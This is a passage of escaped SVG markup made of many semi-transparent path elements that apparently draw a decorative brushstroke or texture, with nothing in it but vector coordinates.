d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path 